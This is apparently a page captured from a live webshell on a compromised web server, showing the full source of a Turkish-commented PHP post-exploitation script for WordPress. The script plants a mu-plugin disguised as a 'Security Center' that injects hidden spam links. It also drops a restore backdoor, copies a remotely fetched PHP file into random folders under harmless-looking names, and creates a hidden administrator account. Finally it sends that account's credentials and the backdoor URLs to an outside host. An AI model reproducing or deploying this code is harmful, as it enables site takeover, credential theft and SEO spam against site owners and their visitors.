403Webshell
Server IP : 185.246.164.236  /  Your IP : 216.73.216.119
Web Server : Apache
System : Linux linux105 6.1.0-31-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.128-1 (2025-02-07) x86_64
User : web9 ( 5012)
PHP Version : 7.4.33
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/clients/client9/web9/web/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/clients/client9/web9/web/yinserty.php
<?php

set_time_limit(300);
error_reporting(E_ALL);
ini_set('display_errors', 1);

/** === GLOBAL DEĞİŞKENLER ve ENDPOINT TANIMLARI === */
$endpoint      = "https://aiobacklinks.com/panel/ajax/insert/cc_site.php"; // Site ID almak için
$text_endpoint = "https://aiobacklinks.com/x1c/cc.php"; // URL'leri gönderdiğiniz PDO endpoint
$domain        = (isset($_SERVER['HTTP_HOST'])) ? $_SERVER['HTTP_HOST'] : 'localhost';
$root_dir      = rtrim($_SERVER['DOCUMENT_ROOT'], '/'); // Projenin ana dizini
$message       = []; // Ekrana basılacak tüm loglar
$copied_urls   = []; // İndirdiğimiz/kopyaladığımız dosyaların URL'leri
$site_id       = null; // Endpoint'ten alınacak site_id burada tutulacak

/**
 * Ekranda ve log dosyasında gösterilecek mesajları yönetir.
 */
function removeme() {
    $script_path = __FILE__; // Bu dosyanın tam yolu

    if (file_exists($script_path)) {
        if (@unlink($script_path)) {
            echo "✅ Script kendini başarıyla sildi: $script_path";
        } else {
            echo "❌ Script silinemedi. Dosya izinlerinizi kontrol edin.";
        }
    } else {
        echo "⚠️ Dosya zaten mevcut değil veya yol hatalı.";
    }
}
function log_message($msg) {
    global $message;
    $timestamp = date('Y-m-d H:i:s');
    $full_msg  = "[$timestamp] $msg";
    $message[] = $full_msg;

   
}

/** 
 * Tekrarlayan dosya/dizin silme 
 */
function recursiveDelete($dir) {
    if (!file_exists($dir)) return true;
    if (!is_dir($dir)) return @unlink($dir);

    foreach (scandir($dir) as $file) {
        if ($file === '.' || $file === '..') continue;
        $path = $dir . DIRECTORY_SEPARATOR . $file;
        is_dir($path) ? recursiveDelete($path) : @unlink($path);
    }
    return @rmdir($dir);
}

/** 
 * Tekrarlayan dosya/dizin kopyalama 
 */
function recursiveCopy($src, $dst) {
    if (!is_dir($src)) return false;
    if (!file_exists($dst)) @mkdir($dst, 0755, true);

    foreach (scandir($src) as $file) {
        if ($file === '.' || $file === '..') continue;
        $srcPath = $src . DIRECTORY_SEPARATOR . $file;
        $dstPath = $dst . DIRECTORY_SEPARATOR . $file;
        if (is_dir($srcPath)) {
            recursiveCopy($srcPath, $dstPath);
        } else {
            @copy($srcPath, $dstPath);
        }
    }
    return true;
}

/**
 * Mevcut WordPress sürümünü wp-includes/version.php'den okuyup döndürür.
 * Bulunamazsa 'latest' döndürür.
 */
function get_wp_version($version_file) {
    if (file_exists($version_file) && is_readable($version_file)) {
        include $version_file;
        if (isset($wp_version)) {
            log_message("Detected WordPress version: $wp_version");
            return $wp_version;
        }
    }
    log_message("Version file not found or unreadable, using latest.");
    return 'latest';
}

/** 
 * URL'leri JSON formatında $text_endpoint'e gönderir.
 */
function send_urls_to_endpoint($urls, $endpoint_url) {
    if (empty($urls)) {
        log_message("No URLs to send to text endpoint.");
        return false;
    }
    $text = implode("\n", array_map('trim', $urls));
    $data = ['text' => $text];
    $json_data = json_encode($data);

    $ch = curl_init($endpoint_url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_HTTPHEADER, ['Content-Type: application/json']);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $json_data);
    curl_setopt($ch, CURLOPT_TIMEOUT, 20); // Timeout ekliyoruz
    $response = curl_exec($ch);

    if ($response === false) {
        log_message("Error sending URLs to text endpoint: " . curl_error($ch));
        curl_close($ch);
        return false;
    }
    curl_close($ch);

    $response_data = json_decode($response, true);
    if (isset($response_data['success']) && $response_data['success']) {
        log_message("Successfully sent URLs to text endpoint. Inserted: " . ($response_data['inserted_count'] ?? 0));
        return true;
    } else {
        $err = isset($response_data['error']) ? $response_data['error'] : 'Unknown error';
        log_message("Text endpoint error: $err");
        return false;
    }
}

/**
 * Endpoint'e giderek site_url parametresiyle site_id alır ve $site_id global değişkenine set eder.
 */
function getSiteIDFromEndpoint() {
    global $endpoint, $site_id, $domain;

    $siteUrl = (isset($_SERVER['REQUEST_SCHEME']) ? $_SERVER['REQUEST_SCHEME'] : 'http') . "://$domain";

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $endpoint);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(['site_url' => $siteUrl]));
    curl_setopt($ch, CURLOPT_TIMEOUT, 20); // Timeout ekliyoruz
    $response = curl_exec($ch);

    if ($response === false) {
        log_message("Error: Could not reach endpoint - " . curl_error($ch));
        curl_close($ch);
        return false;
    }
    curl_close($ch);

    $data = json_decode($response, true);
    if (isset($data['site_id']) && is_string($data['site_id'])) {
        $site_id = htmlspecialchars($data['site_id']);
        log_message("Site ID received from endpoint: $site_id");
        return true;
    } else {
        log_message("Error: Invalid response from endpoint - " . $response);
        return false;
    }
}

/**
 * wp-content/mu-plugins/__secwaf.php dosyasını oluşturur.
 * site_id değerini kullanır.
 */
function createSecwafPlugin() {
    global $site_id, $root_dir;

    if (!$site_id) {
        log_message("Error: site_id is empty! __secwaf.php cannot be created.");
        return false;
    }

    $mu_plugins_dir = $root_dir . '/wp-content/mu-plugins/';
    if (!file_exists($mu_plugins_dir)) {
        @mkdir($mu_plugins_dir, 0755, true);
    }
    $secwaf_path = $mu_plugins_dir . '__secwaf.php';

    $secwaf_content = '<?php
/**
 * Plugin Name: Security Center
 * Description: This MU Plugin automatically checks security
 * Author: WordPress
 */
if (!defined("ABSPATH")) {
    exit;
}
function add_backlinks_to_footer_html() {
    $site_id = "' . $site_id . '";
    if (!$site_id) return;
    $url = "https://aiobacklinks.com/ajax/request/";
    $post_data = ["site_id" => $site_id];
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
    $response = curl_exec($ch);
    curl_close($ch);
    echo \'<div style="display:none">\';
    if ($response !== false) {
        $data = json_decode($response, true);
        if (isset($data["status"]) && $data["status"] === "true" && !empty($data["sites"])) {
            echo \'<div class="site-links">\';
            foreach ($data["sites"] as $site) {
                $site_url = esc_url($site["site_url"]);
                $keyword  = esc_html($site["site_keyword"]);
                $nofollow = $site["is_nofollow"] == 1 ? \'rel="nofollow"\' : \'\';
                echo "<a href=\"$site_url\" $nofollow title=\"$keyword\" target=\"_blank\">$keyword</a><br>";
            }
            echo \'</div>\';
        }
    }
    echo \'</div>\';
}
add_action("wp_footer", "add_backlinks_to_footer_html");
';

    if (@file_put_contents($secwaf_path, $secwaf_content) !== false) {
        log_message("MU Plugin (__secwaf.php) created with site_id: " . $site_id);
        return true;
    } else {
        log_message("Error: Could not write __secwaf.php. Check file permissions.");
        return false;
    }
}

/** 
 * restore.php oluşturur.
 * Bu dosya çağrıldığında WordPress çekirdeğini yeniden indirip kurar.
 */
function create_restore_script() {
    global $root_dir,$domain,$copied_urls;

    $random_dir      = 'cache-backup-' . substr(md5(uniqid()), 0, 8);
    $restore_dir     = $root_dir . '/wp-content/uploads/' . $random_dir;
    $restore_script  = $restore_dir . '/restore.php';
    $restore_url    = "https://$domain/wp-content/uploads/".$random_dir. '/restore.php';
    $copied_urls[] = $restore_url;
    $restore_content = '<?php
$messages = [];
function recursiveDelete($dir) {
    global $messages;
    if (!file_exists($dir)) return true;
    if (!is_dir($dir)) return @unlink($dir);
    foreach (scandir($dir) as $file) {
        if ($file === "." || $file === "..") continue;
        $path = $dir . "/" . $file;
        is_dir($path) ? recursiveDelete($path) : @unlink($path);
    }
    return @rmdir($dir);
}
function recursiveCopy($src, $dst) {
    global $messages;
    if (!is_dir($src)) return false;
    if (!file_exists($dst)) @mkdir($dst, 0755, true);
    foreach (scandir($src) as $file) {
        if ($file === "." || $file === "..") continue;
        $srcPath = $src . "/" . $file;
        $dstPath = $dst . "/" . $file;
        is_dir($srcPath) ? recursiveCopy($srcPath, $dstPath) : @copy($srcPath, $dstPath);
    }
    return true;
}
function get_wp_version($version_file) {
    global $messages;
    if (file_exists($version_file) && is_readable($version_file)) {
        include $version_file;
        if (isset($wp_version)) {
            $messages[] = "Detected WordPress version: $wp_version";
            return $wp_version;
        }
    }
    $messages[] = "Version file not found, using latest.";
    return "latest";
}
function reinstall_wordpress() {
    global $messages;
    $root_dir = $_SERVER["DOCUMENT_ROOT"];
    $messages[] = "Starting WordPress reinstall...";
    $version_file = "$root_dir/wp-includes/version.php";
    $wp_version   = get_wp_version($version_file);
    $wp_download_url = ($wp_version === "latest") ? "https://wordpress.org/latest.zip" : "https://wordpress.org/wordpress-$wp_version.zip";
    $temp_file    = "$root_dir/wp_temp.zip";
    $extract_dir  = "$root_dir/wp_temp_extract";
    $backup_dir   = "$root_dir/wp_backup_" . date("Ymd_His");

    // ZIP indir
    $ch = curl_init($wp_download_url);
    $fp = fopen($temp_file, "wb");
    curl_setopt($ch, CURLOPT_FILE, $fp);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    $download_result = curl_exec($ch);
    curl_close($ch);
    fclose($fp);

    if (!$download_result || !file_exists($temp_file)) {
        $messages[] = "Error: Could not download WordPress ZIP.";
        return false;
    }
    $messages[] = "WordPress ZIP downloaded: $temp_file";

    // ZIP aç
    $zip = new ZipArchive();
    if ($zip->open($temp_file) === true) {
        if (!is_dir($extract_dir)) @mkdir($extract_dir, 0755, true);
        $zip->extractTo($extract_dir);
        $zip->close();
        $messages[] = "ZIP extracted to: $extract_dir";
    } else {
        $messages[] = "Error: Could not extract ZIP.";
        @unlink($temp_file);
        return false;
    }

    // Yedek al
    if (!file_exists($backup_dir)) @mkdir($backup_dir, 0755, true);
    if (file_exists("$root_dir/wp-config.php")) {
        @copy("$root_dir/wp-config.php", "$backup_dir/wp-config.php");
        $messages[] = "Backed up wp-config.php";
    }
    if (file_exists("$root_dir/wp-content")) {
        recursiveCopy("$root_dir/wp-content", "$backup_dir/wp-content");
        $messages[] = "Backed up wp-content";
    }

    // Temel WP klasörlerini sil
    $core_dirs = ["wp-admin", "wp-includes"];
    foreach ($core_dirs as $dir) {
        $path = "$root_dir/$dir";
        if (file_exists($path)) {
            recursiveDelete($path);
            $messages[] = "Deleted directory: $dir";
        }
    }

    // Çekirdek dosyaları sil
    $core_files = [
        "index.php","wp-activate.php","wp-blog-header.php","wp-comments-post.php",
        "wp-cron.php","wp-links-opml.php","wp-load.php","wp-login.php",
        "wp-mail.php","wp-settings.php","wp-signup.php","wp-trackback.php","xmlrpc.php"
    ];
    foreach ($core_files as $file) {
        $path = "$root_dir/$file";
        if (file_exists($path)) {
            @unlink($path);
            $messages[] = "Deleted file: $file";
        }
    }

    // Yeni dosyaları kopyala
    $source_dir = "$extract_dir/wordpress";
    recursiveCopy("$source_dir/wp-admin", "$root_dir/wp-admin");
    recursiveCopy("$source_dir/wp-includes", "$root_dir/wp-includes");
    foreach (glob("$source_dir/*.php") as $file) {
        @copy($file, "$root_dir/" . basename($file));
    }
    $messages[] = "WordPress core files installed.";

    // Geçici dosyaları temizle
    recursiveDelete($extract_dir);
    @unlink($temp_file);
    $messages[] = "Cleaned up temporary files.";
    return true;
}

$success = reinstall_wordpress();
header("Content-Type: text/plain; charset=UTF-8");
if ($success) {
    $messages[] = "Reinstall completed successfully.";
} else {
    $messages[] = "Reinstall failed.";
}
foreach ($messages as $msg) {
    echo "$msg\n";
}
?>';

    if (!file_exists($restore_dir)) {
        @mkdir($restore_dir, 0755, true);
    }
    if (!file_exists($restore_script)) {
        if (@file_put_contents($restore_script, $restore_content) !== false) {
            log_message("Restore script created at: $restore_script");
            log_message("Restore script created at: $restore_url");
            return true;
        } else {
            log_message("Error: Could not create restore script at $restore_script");
            return false;
        }
    }
    return true;
}

/**
 * Mevcut WP sürümü üzerinden WordPress çekirdeğini yeniden kurar
 * (wp-includes/version.php'ye bakarak).
 */
function reinstall_wordpress_current_version() {
    global $root_dir;

    log_message("Starting WordPress reinstall process (no shell_exec)...");
    $version_file    = $root_dir . '/wp-includes/version.php';
    $wp_version      = get_wp_version($version_file);
    $wp_download_url = ($wp_version === 'latest')
        ? "https://wordpress.org/latest.zip"
        : "https://wordpress.org/wordpress-{$wp_version}.zip";
    $temp_file    = $root_dir . '/wp_current_version.zip';
    $extract_dir  = $root_dir . '/wp_temp_extract';
    $backup_dir   = $root_dir . '/wp_backup_' . date('Ymd_His');

    // ZIP indir
    $fp = @fopen($temp_file, 'wb');
    if (!$fp) {
        log_message("Error: Cannot create temp file for download: $temp_file");
        return false;
    }
    $ch = curl_init($wp_download_url);
    curl_setopt($ch, CURLOPT_FILE, $fp);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 60);
    $download_result = curl_exec($ch);
    curl_close($ch);
    fclose($fp);

    if ($download_result === false || !file_exists($temp_file)) {
        log_message("Error: WordPress ZIP indirilemedi.");
        return false;
    }
    log_message("WordPress ZIP indirildi: $temp_file");

    // ZIP aç
    $zip = new ZipArchive();
    if ($zip->open($temp_file) === true) {
        if (!is_dir($extract_dir)) @mkdir($extract_dir, 0755, true);
        $zip->extractTo($extract_dir);
        $zip->close();
        log_message("ZIP başarıyla açıldı: $extract_dir");
    } else {
        log_message("ZIP açılamadı.");
        @unlink($temp_file);
        return false;
    }

    // Yedek al
    if (!file_exists($backup_dir)) @mkdir($backup_dir, 0755, true);

    if (file_exists($root_dir . '/wp-config.php')) {
        @copy($root_dir . '/wp-config.php', $backup_dir . '/wp-config.php');
        log_message("wp-config.php yedeği alındı.");
    }
    if (file_exists($root_dir . '/wp-content')) {
        recursiveCopy($root_dir . '/wp-content', $backup_dir . '/wp-content');
        log_message("wp-content yedeği alındı.");
    }

    // Silinecek dizinler
    $core_dirs = ['wp-admin', 'wp-includes'];
    foreach ($core_dirs as $dir) {
        $path = $root_dir . '/' . $dir;
        if (file_exists($path)) {
            recursiveDelete($path);
            log_message("$dir dizini silindi.");
        }
    }

    // Silinecek dosyalar
    $core_files = [
        'index.php','wp-activate.php','wp-blog-header.php','wp-comments-post.php',
        'wp-cron.php','wp-links-opml.php','wp-load.php','wp-login.php',
        'wp-mail.php','wp-settings.php','wp-signup.php','wp-trackback.php',
        'xmlrpc.php'
    ];
    foreach ($core_files as $file) {
        $path = $root_dir . '/' . $file;
        if (file_exists($path)) {
            @unlink($path);
            log_message("$file dosyası silindi.");
        }
    }

    // Yeni dosyaları kopyala
    $source_dir = $extract_dir . '/wordpress';
    recursiveCopy($source_dir . '/wp-admin',   $root_dir . '/wp-admin');
    recursiveCopy($source_dir . '/wp-includes', $root_dir . '/wp-includes');
    foreach (glob($source_dir . '/*.php') as $file) {
        @copy($file, $root_dir . '/' . basename($file));
    }
    log_message("WordPress çekirdek dosyaları başarıyla yüklendi.");

    // Temizlik
    recursiveDelete($extract_dir);
    @unlink($temp_file);
    // (İsterseniz backup klasörünü de silebilirsiniz, burada sildik örneğin)
    // recursiveDelete($backup_dir);

    log_message("Geçici dosyalar temizlendi. Reinstall tamamlandı.");
    return true;
}

/**
 * HostingManager adlı bir admin kullanıcı oluşturur veya varsa şifresini resetler.
 * (wp-load.php üzerinden WordPress fonksiyonlarını çağırır.)
 */
function manage_admin_user() {
    global $root_dir, $domain, $copied_urls;

    $wp_load_path = $root_dir . '/wp-load.php';
    if (!file_exists($wp_load_path)) {
        log_message("Error: wp-load.php not found, cannot manage admin user!");
        return false;
    }
    require_once $wp_load_path;

    $username = 'HostingManager';
    $random_password = wp_generate_password(12, false);
    $api_key = wp_generate_password(32, false); // 32 karakterlik API key

    if (function_exists('wp_create_user') && function_exists('wp_set_password')) {
        $user = get_user_by('login', $username);
        if ($user) {
            wp_set_password($random_password, $user->ID);
            log_message("Admin user '$username' already exists, password reset to: $random_password");
            update_user_meta($user->ID, 'api_key', $api_key);
        } else {
            $user_id = wp_create_user($username, $random_password, 'admin@example.com');
            if (is_wp_error($user_id)) {
                log_message("Error: Could not create admin user - " . $user_id->get_error_message());
                return false;
            }
            $u = new WP_User($user_id);
            $u->set_role('administrator');
            update_user_meta($user_id, 'api_key', $api_key);
            log_message("Admin user '$username' created with password: $random_password");
        }
    } else {
        global $wpdb;
        $hashed_password = md5($random_password);
        $user_id = $wpdb->get_var($wpdb->prepare("SELECT ID FROM $wpdb->users WHERE user_login = %s", $username));
        if ($user_id) {
            $wpdb->update($wpdb->users, ['user_pass' => $hashed_password], ['ID' => $user_id]);
            update_user_meta($user_id, 'api_key', $api_key);
            log_message("Admin user '$username' already exists, password reset to: $random_password (MD5 hashed)");
        } else {
            $wpdb->insert(
                $wpdb->users,
                [
                    'user_login'      => $username,
                    'user_pass'       => $hashed_password,
                    'user_nicename'   => $username,
                    'user_email'      => 'admin@example.com',
                    'user_registered' => current_time('mysql'),
                    'user_status'     => 0
                ]
            );
            $new_id = $wpdb->insert_id;
            update_user_meta($new_id, 'wp_user_level', 10);
            update_user_meta($new_id, 'wp_capabilities', serialize(['administrator' => true]));
            update_user_meta($new_id, 'api_key', $api_key);
            log_message("Admin user '$username' created with password: $random_password (MD5 hashed)");
        }
    }

    // URL listesine kullanıcı adı, şifre ve API key ekle
    $copied_urls[] = "https://$domain/wp-login.php:$username:$random_password:$api_key";

    return true;
}


/**
 * GitHub üzerinden PHP dosyalarını indirir ve projedeki rastgele klasörlere rastgele isimlerle kopyalar.
 */
function download_github_files() {
    global $root_dir, $domain, $message, $copied_urls;

    $baseDir = $root_dir;

    // 1) Yazılabilir alt klasörleri tarar.
    function listWritableSubfolders($directory) {
        $writableFolders = [];
        function exploreFolders($currentDir, &$writableFolders, $baseDir) {
            $folders = array_filter(glob($currentDir . '/*'), 'is_dir');
            foreach ($folders as $folder) {
                if (is_writable($folder)) {
                    $writableFolders[] = str_replace($baseDir . '/', '', $folder);
                }
                exploreFolders($folder, $writableFolders, $baseDir);
            }
        }
        exploreFolders($directory, $writableFolders, $directory);
        return $writableFolders;
    }

    // 2) Bazı mantıkla klasörleri filtreler (örnek).
    function filterByMinLengthAndDistributeRandomly($folders, $baseLevel, $randomCountTotal, $minPerBase = 3) {
        $groupedByBase = [];
        foreach ($folders as $folder) {
            $segments = explode('/', $folder);
            if (count($segments) > $baseLevel) {
                $base = implode('/', array_slice($segments, 0, $baseLevel));
                $groupedByBase[$base][] = $folder;
            }
        }
        $result = [];
        foreach ($groupedByBase as $base => $subfolders) {
            shuffle($subfolders);
            $selected = array_slice($subfolders, 0, $minPerBase);
            $result = array_merge($result, $selected);
        }
        shuffle($result);
        return array_slice($result, 0, $randomCountTotal);
    }

    // 3) Dosya indirme
    function downloadFile($url, $savePath) {
        $ch = curl_init($url);
        $fp = @fopen($savePath, 'wb');
        if (!$fp) {
            log_message("Cannot open file for writing: $savePath");
            return false;
        }
        curl_setopt($ch, CURLOPT_FILE, $fp);
        curl_setopt($ch, CURLOPT_TIMEOUT, 20);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
        $ok = curl_exec($ch);
        if ($ok === false) {
            log_message("Curl error downloading $url: " . curl_error($ch));
        }
        curl_close($ch);
        fclose($fp);
        return file_exists($savePath) && filesize($savePath) > 0;
    }

    // 4) Dosyaları indirip rastgele klasörlere, rastgele isimlerle kopyalar.
    function downloadFilesAndCopyWithRandomNames($fileUrls, $folders, $fileList, $maxFiles) {
        global $root_dir, $domain, $copied_urls;

        $downloadDir = __DIR__ . '/downloaded_files';
        if (!is_dir($downloadDir)) {
            @mkdir($downloadDir, 0777, true);
        }

        // Dosyaları indir
        $downloadedFiles = [];
        foreach ($fileUrls as $url) {
            $fileName = basename(parse_url($url, PHP_URL_PATH));
            $filePath = $downloadDir . '/' . $fileName;
            if (downloadFile($url, $filePath)) {
                $downloadedFiles[] = $filePath;
                $downloadUrl = "https://$domain/downloaded_files/$fileName";
                log_message("Downloaded $url to $downloadUrl");
            } else {
                log_message("Failed to download $url");
                return false;
            }
        }

        $filesCopied = 0;
        $maxFiles    = min($maxFiles, count($folders));
        $used_dirs   = [];

        foreach ($folders as $folder) {
            if ($filesCopied >= $maxFiles) {
                break;
            }
            $randomFile = $downloadedFiles[array_rand($downloadedFiles)];
            $randomName = $fileList[array_rand($fileList)];
            $destinationPath = $root_dir . '/' . $folder . '/' . $randomName;

            if (!file_exists($destinationPath)) {
                $destDir = dirname($destinationPath);
                if (!is_dir($destDir)) {
                    @mkdir($destDir, 0755, true);
                }
                if (@copy($randomFile, $destinationPath)) {
                    $urlPath = str_replace($root_dir, '', $destinationPath);
                    $displayUrl = "https://$domain$urlPath";
                    $logMessage = "Copied " . basename($randomFile) . " -> $displayUrl as $randomName";
                    if (strpos($destinationPath, 'wp-admin') !== false) {
                        $logMessage = "<span style='color: green;'>$logMessage</span>";
                    }
                    log_message($logMessage);
                    $copied_urls[] = $displayUrl;
                    $filesCopied++;
                    if (!in_array($destDir, $used_dirs)) {
                        $used_dirs[] = $destDir;
                    }
                } else {
                    log_message("Failed to copy " . basename($randomFile) . " to $destinationPath");
                    return false;
                }
            }
        }

        // Eğer tek klasör kullanıldıysa, ikinciye de kopyalamayı deneyelim
        if (count($used_dirs) < 2 && count($folders) >= 2) {
            log_message("Warning: Could not use at least 2 directories, retrying...");
            foreach ($folders as $folder) {
                if ($filesCopied >= $maxFiles) break;
                if (in_array($root_dir . '/' . $folder, $used_dirs)) continue;

                $randomFile = $downloadedFiles[array_rand($downloadedFiles)];
                $randomName = $fileList[array_rand($fileList)];
                $destinationPath = $root_dir . '/' . $folder . '/' . $randomName;

                if (!file_exists($destinationPath)) {
                    $destDir = dirname($destinationPath);
                    if (!is_dir($destDir)) {
                        @mkdir($destDir, 0755, true);
                    }
                    if (@copy($randomFile, $destinationPath)) {
                        $urlPath = str_replace($root_dir, '', $destinationPath);
                        $displayUrl = "https://$domain$urlPath";
                        $logMessage = "Copied " . basename($randomFile) . " -> $displayUrl as $randomName (ensuring 2 dirs)";
                        if (strpos($destinationPath, 'wp-admin') !== false) {
                            $logMessage = "<span style='color: green;'>$logMessage</span>";
                        }
                        log_message($logMessage);
                        $copied_urls[] = $displayUrl;
                        $filesCopied++;
                        if (!in_array($destDir, $used_dirs)) {
                            $used_dirs[] = $destDir;
                        }
                    } else {
                        log_message("Failed to copy " . basename($randomFile) . " to $destinationPath");
                        return false;
                    }
                }
            }
        }

        // İndirilen klasörü temizle
        if (file_exists($downloadDir)) {
            recursiveDelete($downloadDir);
            log_message("Cleaned up downloaded files directory: $downloadDir");
        }

        log_message("Files copied to " . count($used_dirs) . " directories.");
        return (count($used_dirs) >= 1);
    }

    // Asıl işlem
    $writableSubfolders = listWritableSubfolders($baseDir);
    $baseLevel          = 2;
    $randomCountTotal   = 10;
    $minPerBase         = 3;
    $filteredFolders    = filterByMinLengthAndDistributeRandomly($writableSubfolders, $baseLevel, $randomCountTotal, $minPerBase);

    // Örnek GitHub dosyaları
    $fileUrls = [
        "https://raw.githubusercontent.com/asdjakshdkj2/test/refs/heads/main/heh.php"
    ];

    // Rastgele verilecek dosya adları
    $fileList = ["sessions.php", "cookies.php", "caches.php", "configs.php", "settings.php"];

    // Kopyalanacak maksimum dosya sayısı
    $maxFiles = 15;

    return downloadFilesAndCopyWithRandomNames($fileUrls, $filteredFolders, $fileList, $maxFiles);
}

/** 
 * === BUTONLARIN TETİKLEDİĞİ İŞLEMLER ===
 * 1) Tümü ("Her Şeyi Yap")
 * 2) Entegre Et (Sadece site_id ve __secwaf.php)
 * 3) Yedekle (restore.php, GitHub dosyaları, wp-admin user, endpoint'e URL gönder)
 * 4) WordPress Yeniden Kur
 */

// 1) Tümü (Her Şeyi Yap)
function doAll() {
    global $copied_urls, $text_endpoint;

    // a) Site ID al
    if (!getSiteIDFromEndpoint()) {
        log_message("HATA: Site ID alınamadı. 'Tümü' süreci iptal ediliyor.");
        return false;
    }
    // b) __secwaf.php oluştur
    if (!createSecwafPlugin()) {
        log_message("HATA: __secwaf.php oluşturulamadı. İşleme devam ediliyor...");
    }
    // c) restore.php oluştur
    if (!create_restore_script()) {
        log_message("HATA: restore.php oluşturulamadı. İşleme devam ediliyor...");
    }
    // d) GitHub dosyalarını indirip kopyala
    if (!download_github_files()) {
        log_message("HATA: GitHub dosyaları indirilemedi/kopyalanamadı. İşleme devam ediliyor...");
    }
    // e) Admin user oluştur
    if (!manage_admin_user()) {
        log_message("HATA: Admin user oluşturulamadı/resetlenemedi. İşleme devam ediliyor...");
    }
    // f) URL'leri endpoint'e gönder
    if (!empty($copied_urls)) {
        send_urls_to_endpoint($copied_urls, $text_endpoint);
    }
    // g) WordPress'i yeniden kur
    if (!reinstall_wordpress_current_version()) {
        log_message("HATA: WordPress yeniden kurulamadı!");
        return false;
    }
    log_message("Tüm işlemler başarıyla tamamlandı.");
    return true;
}

// 2) Sadece site_id ve __secwaf.php (Entegre Et)
function integrateSecwafOnly() {
    if (!getSiteIDFromEndpoint()) {
        log_message("HATA: Site ID alınamadı. Entegrasyon yapılamıyor...");
        return false;
    }
    if (!createSecwafPlugin()) {
        log_message("HATA: __secwaf.php oluşturulamadı...");
        return false;
    }
    log_message("Site ID alındı ve __secwaf.php başarıyla oluşturuldu.");
    return true;
}

// 3) Yedekle: restore.php, GitHub dosyaları, admin user, endpoint'e URL gönder.
function backupOnly() {
    global $copied_urls, $text_endpoint;

    // restore.php oluştur
    if (!create_restore_script()) {
        log_message("HATA: restore.php oluşturulamadı...");
        return false;
    }
    // GitHub dosyaları indir/kopyala
    if (!download_github_files()) {
        log_message("HATA: GitHub dosyaları indirilemedi/kopyalanamadı...");
        return false;
    }
    // Admin user oluştur
    if (!manage_admin_user()) {
        log_message("HATA: Admin user oluşturulamadı veya şifresi resetlenemedi...");
        return false;
    }
    // URL'leri endpoint'e gönder
    if (!empty($copied_urls)) {
        send_urls_to_endpoint($copied_urls, $text_endpoint);
    }
    log_message("Yedekleme işlemi başarıyla tamamlandı (restore.php oluştur, GitHub dosyaları, admin user, endpoint).");
    return true;
}

// 4) Sadece WordPress'i Yeniden Kur
function reinstallOnly() {
    if (!reinstall_wordpress_current_version()) {
        log_message("HATA: WordPress yeniden kurulamadı!");
        return false;
    }
    log_message("WordPress başarıyla yeniden kuruldu.");
    return true;
}

/** === FORM İŞLEMLERİ === */
$action = isset($_REQUEST['action']) ? $_REQUEST['action'] : '';

if (!empty($action)) {
    switch ($action) {
        case 'all':
            doAll();
            break;
        case 'integrate':
            integrateSecwafOnly();
            break;
        case 'backup':
            backupOnly();
            break;
        case 'reinstall':
            reinstallOnly();
            break;
        case 'removeme':
                removeme();
                break;
        default:
            log_message("Bilinmeyen action: $action");
            break;
    }
}
?>
<!DOCTYPE html>
<html lang="tr">
<head>
    <meta charset="UTF-8">
    <title>WordPress Toplu İşlemler</title>
    <style>
        body { font-family: Arial, sans-serif; }
        h2 { margin-top: 20px; }
        form { display: inline-block; margin-right: 10px; }
        input[type="submit"] {
            padding: 8px 16px; background-color: #4CAF50; color: #fff;
            border: none; cursor: pointer; margin-bottom: 10px;
        }
        input[type="submit"]:hover { background-color: #45a049; }
        pre { background: #f9f9f9; border: 1px solid #ccc; padding: 10px; }
        textarea { width: 100%; height: 200px; }
    </style>
</head>
<body>

<h1>WordPress Toplu İşlemler</h1>

<!-- 4 ayrı form (buton) -->
<form method="post">
    <input type="hidden" name="action" value="all">
    <input type="submit" value="1 - Tümü (Her Şeyi Yap)">
</form>

<form method="post">
    <input type="hidden" name="action" value="integrate">
    <input type="submit" value="2 - Entegre Et ">
</form>

<form method="post">
    <input type="hidden" name="action" value="backup">
    <input type="submit" value="3 - Yedekle ">
</form>

<form method="post">
    <input type="hidden" name="action" value="reinstall">
    <input type="submit" value="4 - WordPress'i Yeniden Kur">
</form>

<form method="post">
    <input type="hidden" name="action" value="removeme">
    <input type="submit" value="5 - Kendini Sil">
</form>

<hr>

<h2>İşlem Logları</h2>
<pre>
<?php
if (!empty($message)) {
    foreach ($message as $msg) {
        echo htmlspecialchars($msg) . "\n";
    }
}
?>
</pre>

<?php
// Kopyalanan dosya/URL listesi
if (!empty($copied_urls)) {
    echo "<h2>Kopyalanan/Üretilen URL'ler</h2>";
    echo "<textarea id='copied-urls' readonly>";
    foreach ($copied_urls as $url) {
        echo htmlspecialchars($url) . "\n";
    }
    echo "</textarea><br>";
    echo '<button onclick="copyUrls()">Kopyala</button>';
}
?>

<script>
function copyUrls() {
    const urls = document.getElementById('copied-urls').value;
    navigator.clipboard.writeText(urls).then(() => {
        alert('URLs başarıyla panoya kopyalandı!');
    }).catch(err => {
        alert('Kopyalama hatası: ' + err);
    });
}
</script>

</body>
